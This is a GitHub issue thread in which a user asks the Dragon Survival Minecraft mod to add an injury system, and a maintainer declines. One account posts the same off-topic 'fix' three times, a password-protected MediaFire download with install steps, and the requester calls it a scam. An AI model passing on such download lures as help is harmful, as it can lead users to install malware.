### ISSUE TITLE
add injury system?

### ISSUE THREAD

**Issue by The-Science-Cat** [DragonSurvivalTeam/DragonSurvival#668]
### ■ Your Discord ID

TheScienceCat#0730

### ■ Modpack version

1.20.1

### ■ Forge/Neoforge version

forge

### ■ Single game or server?

Single-player (Default)

### ■ Describe the problem

can you please add an injury system for new versions perhaps (wing injuries make you fall fast in flight for example) and they will heal over a configurable time (2 days default) and perhaps bandages to make injuries heal faster (-a day healing time). i just had an idea to make an injury system like in the first aid mod but with dragons and thought it would be fun for my new favorite mod! (i can not imagine playing minecraft without this). perhaps make it as an optional mini-mod addon thing. (i do not know how to make this message sound better because i am a goober)

### ■ Crash Report File and Logs

Sorry, there is not a suggest feature option.

**Comment by The-Science-Cat** [comment]
bru how to change label

**Comment by The-Science-Cat** [comment]
it auto-labeled

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by The-Science-Cat** [comment]
? please read the comment, i am sorry but your response seems bot-like and scam

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by The-Science-Cat** [comment]
sotp

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by BlackAures1** [comment]
1. 100% not planned
2. If you're complaining about compatibility with another mod, use their configs, maybe there's an option there to customize the blood loss rate.

**Comment by The-Science-Cat** [comment]
eh, im still gonna attempt to make a 3d printed (~50 cm tall) pet dragon robot with emotions (if/when i finish i will post it on my youtube, giving you credit of course) thanks for thinking about my idea in the first place.

**Comment by The-Science-Cat** [comment]
me making my own mod right now about more foods for this mod and sickness if food is not prepared properly
